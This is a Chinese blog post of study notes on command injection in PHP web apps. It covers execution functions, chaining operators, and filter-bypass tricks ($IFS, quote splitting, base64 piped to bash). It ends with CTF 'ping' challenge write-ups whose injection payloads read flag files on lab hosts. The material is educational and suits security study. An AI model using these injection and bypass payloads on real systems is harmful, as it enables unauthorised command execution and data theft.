<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>命令执行漏洞 | 鲸鱼的世界</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="pingping直接输入地址并执行自己想要的命令 有index.php可以试试 访问成功，在试试寻找“.txt”文件，输入命令 127.0.0.1 &amp;&amp;find &#x2F; -name “*.txt” 找到flag文件了，用cat命令抓一下：127.0.0.1 &amp;&amp; cat &#x2F;home&#x2F;flag.txt ping 127.0.0.1&amp;&amp;dir 1234567">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行漏洞">
<meta property="og:url" content="http://example.com/2020/09/20/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="鲸鱼的世界">
<meta property="og:description" content="pingping直接输入地址并执行自己想要的命令 有index.php可以试试 访问成功，在试试寻找“.txt”文件，输入命令 127.0.0.1 &amp;&amp;find &#x2F; -name “*.txt” 找到flag文件了，用cat命令抓一下：127.0.0.1 &amp;&amp; cat &#x2F;home&#x2F;flag.txt ping 127.0.0.1&amp;&amp;dir 1234567">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDGDFCPDBDADCCOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDGDJCPMOKCNAMFLNNIMNLMFPDCDADCDADADIDCDIDCDDDFDIDCDJCOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDHDACPMOKCNAMFLNNIMNLMFPDCDADCDADADIDCDIDCDDDFDIDDDICOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDGDGCPDICOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDEDBDGDJDBCPDBDECOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDEDBDGDJDDCPDBDCCOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDEDBDGDJDECPDBDBCOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDJDDDDDFCPDBCOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDJDDDDDGCPDCCOHAGOGH">
<meta property="og:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDJDDDEDACPDDCOHAGOGH">
<meta property="article:published_time" content="2020-09-20T09:31:27.174Z">
<meta property="article:modified_time" content="2020-10-28T05:00:51.590Z">
<meta property="article:author" content="eeknight">
<meta property="article:tag" content="知识点">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDGDFCPDBDADCCOHAGOGH">
  
    <link rel="alternate" href="/atom.xml" title="鲸鱼的世界" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">鲸鱼的世界</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-命令执行漏洞" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/09/20/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" class="article-date">
  <time datetime="2020-09-20T09:31:27.174Z" itemprop="datePublished">2020-09-20</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      命令执行漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h2><p>ping直接输入地址并执行自己想要的命令</p>
<p>有index.php可以试试</p>
<p>访问成功，在试试寻找“.txt”文件，输入命令 127.0.0.1 &amp;&amp;find / -name “*.txt”</p>
<p>找到flag文件了，用cat命令抓一下：127.0.0.1 &amp;&amp; cat /home/flag.txt</p>
<p>ping 127.0.0.1&amp;&amp;dir</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">system()</span><br><span class="line">passthru()</span><br><span class="line">exec()</span><br><span class="line">shell_exec()</span><br><span class="line">popen()</span><br><span class="line">proc_open()</span><br><span class="line">pcntl_exec()</span><br></pre></td></tr></table></figure>

<a id="more"></a>

<ul>
<li>system</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system ( string &#96;$command&#96; [, int &#96;&amp;$return_var&#96; ] ) : string</span><br></pre></td></tr></table></figure>

<p>类似于c语言中的system，他会把传入的参数作为系统命令执行，system返回结果并且输出，这意味着我们可以打印system的输出结果。</p>
<p>示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">system(&#39;ping www.baidu.com&#39;);</span><br><span class="line">echo(system(&#39;ping www.baidu.com&#39;));</span><br></pre></td></tr></table></figure>

<ul>
<li>passthru</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passthru ( string $command [, int &amp;$return_var ] ) : void</span><br></pre></td></tr></table></figure>

<p>执行命令并直接输出结果，看到返回值为空但我们能够看到输出，因此无法用打印函数打印。</p>
<p>示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passthru(&quot;ping www.baidu.com&quot;);</span><br></pre></td></tr></table></figure>

<ul>
<li>exec</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] ) : string</span><br></pre></td></tr></table></figure>

<p>执行命令并返回结果，注意：该函数只返回最后一行的结果，并且需要打印才能看见结果。</p>
<p>示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo exec(&quot;dir&quot;);</span><br></pre></td></tr></table></figure>

<ul>
<li>shell_exec</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell_exec ( string $cmd ) : string</span><br></pre></td></tr></table></figure>

<p>通过shell执行命令并将完整输出作为字符串返回</p>
<p>示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(shell_exec(&quot;dir&quot;)); </span><br></pre></td></tr></table></figure>

<ul>
<li>popen（了解即可）:</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">popen ( string $command , string $mode ) : resource</span><br></pre></td></tr></table></figure>

<p>打开一个指向进程的管道，该进程由派生给定的 command 命令执行而产生。</p>
<p>示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file &#x3D; popen(&quot;&#x2F;bin&#x2F;ls&quot;,&quot;r&quot;);</span><br></pre></td></tr></table></figure>

<h2 id=""><a href="#" class="headerlink" title=""></a></h2><h3 id="连接字符"><a href="#连接字符" class="headerlink" title="连接字符"></a>连接字符</h3><p>&amp;&amp; ； &amp; | || &gt;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">a &amp; b 表示a和b同时运行</span><br><span class="line">a &amp;&amp; b表示 a运行成功后再运行b </span><br><span class="line">例如： </span><br><span class="line">ping baidu.com &amp; whoami      </span><br><span class="line">ping baidu.com &amp;&amp; whoami</span><br><span class="line"></span><br><span class="line">cat &#x2F;flag|ls 表示把cat &#x2F;flag的输出结果作为ls的参数</span><br><span class="line">cat &#x2F;flag||ls 表示前一条语句执行完后再执行后一条语句</span><br><span class="line"></span><br><span class="line">ls &gt; info.txt 表示把ls输出结果写到info.txt中</span><br><span class="line">echo &quot;&lt;?php phpinfo();?&gt;&quot; &gt; hack.php 表示把php代码写到hack.php文件中</span><br></pre></td></tr></table></figure>

<p>“ | ” 是管道符，表示将 Command 1 的输出作为Command 2 的输入，并且只打印Command 2 执行的结果。</p>
<h3 id="常用系统命令"><a href="#常用系统命令" class="headerlink" title="常用系统命令"></a>常用系统命令</h3><p>查看当前用户</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">users</span><br><span class="line">whoami</span><br><span class="line">who am i</span><br></pre></td></tr></table></figure>

<p>查看系统名和部分信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">uname</span><br><span class="line">uname -r</span><br><span class="line">uname -s</span><br><span class="line">uname -a</span><br></pre></td></tr></table></figure>

<p>切换路径</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cd</span><br><span class="line">cd ..</span><br><span class="line">cd ..&#x2F;</span><br><span class="line">cd ..&#x2F;..&#x2F;..&#x2F;</span><br><span class="line">cd &#x2F;</span><br><span class="line">cd .&#x2F;xxx</span><br></pre></td></tr></table></figure>

<p>查看文件内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;flag </span><br><span class="line">文件完整内容</span><br><span class="line">head &#x2F;flag</span><br><span class="line">文件前十行内容</span><br><span class="line">tail &#x2F;flag</span><br><span class="line">文件后十行内容</span><br></pre></td></tr></table></figure>

<p>ls() -查看当前目录下有什么文件</p>
<p>pwd 查看当前绝对路径</p>
<p>cat  - 查看文件</p>
<p>dir -查看当前文件目录</p>
<p>find / -iname <em>fla</em>查看文件位置  （这里*为正则表达式的通匹符）</p>
<p>127.0.0.1 &amp;&amp;find / -name “*.txt”</p>
<p><strong>127.0.0.1 &amp;&amp;find / name txt  可能是错误 但是能看全部的目录</strong></p>
<h3 id="长度限制"><a href="#长度限制" class="headerlink" title="长度限制"></a>长度限制</h3><p>我们可以使用<code>&gt;</code>将命令输入到文件名中。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(strlen($_GET[<span class="number">1</span>])&lt;<span class="number">9</span>)&#123;</span><br><span class="line">     <span class="keyword">echo</span> shell_exec($_GET[<span class="number">1</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这道题限制了小于9个字符，而<code>cat /flag</code>刚好有9个字符，那么我们可以将cat写到文件名中，如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;cat</span><br></pre></td></tr></table></figure>

<p>此处代码把空字符串写入到一个名为cat的文件中，然后要执行时可以使用如下语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c* &#x2F;flag</span><br></pre></td></tr></table></figure>

<p>此时会去匹配当前文件名并且把它当成命令来执行，最终成功缩短一个字符执行了</p>
<p><code>cat /flag</code></p>
<h3 id="各种绕过"><a href="#各种绕过" class="headerlink" title="各种绕过"></a>各种绕过</h3><p>像我们如果在拿到了命令执行漏洞，但他做了限制，我们就需要想方设法绕过限制。</p>
<h4 id="前缀限制"><a href="#前缀限制" class="headerlink" title="前缀限制"></a>前缀限制</h4><p><strong>分号</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls;cat &#x2F;flag</span><br></pre></td></tr></table></figure>

<p><strong>连接符</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ls&amp;&amp;cat &#x2F;flag</span><br><span class="line">ls&amp;cat &#x2F;flag</span><br><span class="line">ls|cat &#x2F;flag</span><br><span class="line">ls||cat &#x2F;flag</span><br></pre></td></tr></table></figure>

<h4 id="空格过滤"><a href="#空格过滤" class="headerlink" title="空格过滤"></a>空格过滤</h4><p>这个是最常见的过滤，但这个也是最容易绕过的过滤，开发方过滤了空格虽然限制了我们能执行一部分命令，但事实上是很容易绕过的，以cat flag为例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cat flag.txt</span><br><span class="line">cat$&#123;IFS&#125;flag.txt</span><br><span class="line">cat$IFS$9flag.txt</span><br><span class="line">cat&lt;flag.txt</span><br><span class="line">cat&lt;&gt;flag.txt</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$IFS&#96;、&#96;$&#123;IFS&#125;&#96;、&#96;$IFS$一位数字</span><br></pre></td></tr></table></figure>

<p>{cat,flag} 逗号代替空格</p>
<h4 id="黑名单过滤"><a href="#黑名单过滤" class="headerlink" title="黑名单过滤"></a>黑名单过滤</h4><p>如果使用了黑名单过滤，比如把cat函数或者是把flag给禁了，那么我们可以用以下几种方式来绕过，这里需要看具体题目，这里不代表全部。</p>
<p>1.base64</p>
<p>例如过滤掉了ls，我们需要执行时可以通过把命令base64编码后用base64解码来绕过黑名单过滤。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;bHM&#x3D;&quot;|base64 -d|bash  </span><br></pre></td></tr></table></figure>

<p><code>echo &quot;bHM=&quot;|base64 -d</code>先前说过了，这里就是获取到ls了，此时命令为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash ls</span><br></pre></td></tr></table></figure>

<p>bash可以理解为就是一个命令处理器，我们在命令行输入命令时都是由它来处理我们的输入，那么此时命令就相当于执行了ls。</p>
<p>2.引号</p>
<p>学过编程会知道，引号内加不加空格是有区别的，加空格时表示空一格，不加则没有。</p>
<p>那么我们可以用引号来打断我们的输入但又同时保持我们的最终结果。</p>
<p>如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ca&quot;&quot;t &#x2F;fla&quot;&quot;g</span><br><span class="line">cat&#39;&#39;t &#x2F;fl&#39;&#39;ag</span><br></pre></td></tr></table></figure>

<p>单双引号都可以。</p>
<p>3.反斜杠</p>
<p>反斜杠为换行符，linux允许我们将语句打散到多行再执行，因此可以有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c\a\t fla\g  </span><br></pre></td></tr></table></figure>

<p>4.通配符*</p>
<p>通配符是正则表达式中一个很常用的符号，它遍布了很多地方，当然也包含了命令行。</p>
<p>通配顾名思义通通匹配，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat fla*</span><br></pre></td></tr></table></figure>

<p>他就会去尝试匹配所有前缀含有fla的文件，但有可能我们目录下存在有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">flag</span><br><span class="line">flac</span><br><span class="line">flab</span><br></pre></td></tr></table></figure>

<p>那他就没办法准确匹配到flag了。</p>
<p>5.拼接</p>
<p>这也是一种常用的绕过方法，利用的是命令行允许变量赋值的特性。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;c;b&#x3D;at;c&#x3D;flag;$a$b $c</span><br><span class="line">a&#x3D;cat;b&#x3D;&#x2F;fl;c&#x3D;ag;$a$IFS$9$b$c;</span><br></pre></td></tr></table></figure>

<p>那么这个语句执行下来效果就会是：cat /flag。</p>
<h4 id="例子"><a href="#例子" class="headerlink" title="例子"></a>例子</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">拼接：</span><br><span class="line">&#x2F;?ip&#x3D;127.0.0.1;a&#x3D;g;cat$IFS$1fla$a.php</span><br><span class="line">编码</span><br><span class="line">&#x2F;?ip&#x3D;1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh</span><br><span class="line">内联</span><br><span class="line">&#x2F;?ip&#x3D;127.0.0.1;cat$IFS$9&#96;ls&#96;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><p>g2</p>
<h3 id="ping1"><a href="#ping1" class="headerlink" title="ping1"></a>ping1</h3><p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDGDFCPDBDADCCOHAGOGH" alt="102.png"></p>
<h3 id="ping2"><a href="#ping2" class="headerlink" title="ping2"></a>ping2</h3><p>127.0.0.1&amp;&amp;cat /tmp/flag</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDGDJCPMOKCNAMFLNNIMNLMFPDCDADCDADADIDCDIDCDDDFDIDCDJCOHAGOGH" alt="微信截图_20200828235829.png"></p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDHDACPMOKCNAMFLNNIMNLMFPDCDADCDADADIDCDIDCDDDFDIDDDICOHAGOGH" alt="微信截图_20200828235838.png"></p>
<h3 id="ping3"><a href="#ping3" class="headerlink" title="ping3"></a>ping3</h3><p>127.0.0.1&amp;&amp;cat$IFS$9/fla’’g</p>
<p>绕过空格$IFS$9</p>
<p>flag绕过</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDGDHDGDGCPDICOHAGOGH" alt="8.png"></p>
<h3 id="ping4"><a href="#ping4" class="headerlink" title="ping4"></a>ping4</h3><p>尝试127.0.0.1&amp;&amp;ls 不行</p>
<p>127.0.0.1&amp;&amp;dir可以如下图</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDEDBDGDJDBCPDBDECOHAGOGH" alt="14.png"></p>
<p>47.98.234.232:28002/index.php.bak下载源码，把后面的bak后缀去掉</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDEDBDGDJDDCPDBDCCOHAGOGH" alt="12.png"></p>
<p>看多过滤了一些东西，里面有后面要用的cat 想办法绕过</p>
<p>cat的绕过用c\a\t 去绕过就可以</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDEDBDGDJDECPDBDBCOHAGOGH" alt="11.png"></p>
<h3 id="BUUctf-pingping"><a href="#BUUctf-pingping" class="headerlink" title="BUUctf-pingping"></a>BUUctf-pingping</h3><p>打开靶机</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDJDDDDDFCPDBCOHAGOGH" alt="1.png"></p>
<p>尝试输入ip=1</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDJDDDDDGCPDCCOHAGOGH" alt="2.png"></p>
<p>然后试试ip=1&amp;ls 发现不可以</p>
<p>用ip=1|ls</p>
<p><img src="http://mkpt.gzmtu.edu.cn/meol/common/ckeditor/openfile.jsp?id=DBCPDCDCDJDDDEDACPDDCOHAGOGH" alt="3.png"></p>
<p>看到flag.php，现在的目的大概就是用cat flag.php</p>
<p>输入flag ,空格,{}等一些特殊符号都发现被过滤了</p>
<p>先从空格绕过开始，尝试后发现只能用$IFS或者$IFS$1去绕过</p>
<p>但是在这里$IFS不可以 可能是与后面的冲突了</p>
<p>flag用拼接语句去绕过。</p>
<p>最后的样子：<a target="_blank" rel="noopener" href="http://34d0deb0-665e-4c66-a71e-6969b3296102.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php">http://34d0deb0-665e-4c66-a71e-6969b3296102.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2020/09/20/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" data-id="ckgtjajsj0008h4v5aa3n09jk" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E7%9F%A5%E8%AF%86%E7%82%B9/" rel="tag">知识点</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/10/03/%E5%8F%8D%E5%BA%8F%E5%88%97/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          反序列化
        
      </div>
    </a>
  
  
    <a href="/2020/09/13/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%9F%A5%E8%AF%86%E7%82%B9/" rel="tag">知识点</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BB%83%E4%B9%A0/" rel="tag">练习</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/%E7%9F%A5%E8%AF%86%E7%82%B9/" style="font-size: 20px;">知识点</a> <a href="/tags/%E7%BB%83%E4%B9%A0/" style="font-size: 10px;">练习</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">十月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">九月 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/10/19/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a>
          </li>
        
          <li>
            <a href="/2020/10/12/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含漏洞</a>
          </li>
        
          <li>
            <a href="/2020/10/03/%E5%8F%8D%E5%BA%8F%E5%88%97/">反序列化</a>
          </li>
        
          <li>
            <a href="/2020/09/20/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">命令执行漏洞</a>
          </li>
        
          <li>
            <a href="/2020/09/13/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 eeknight<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>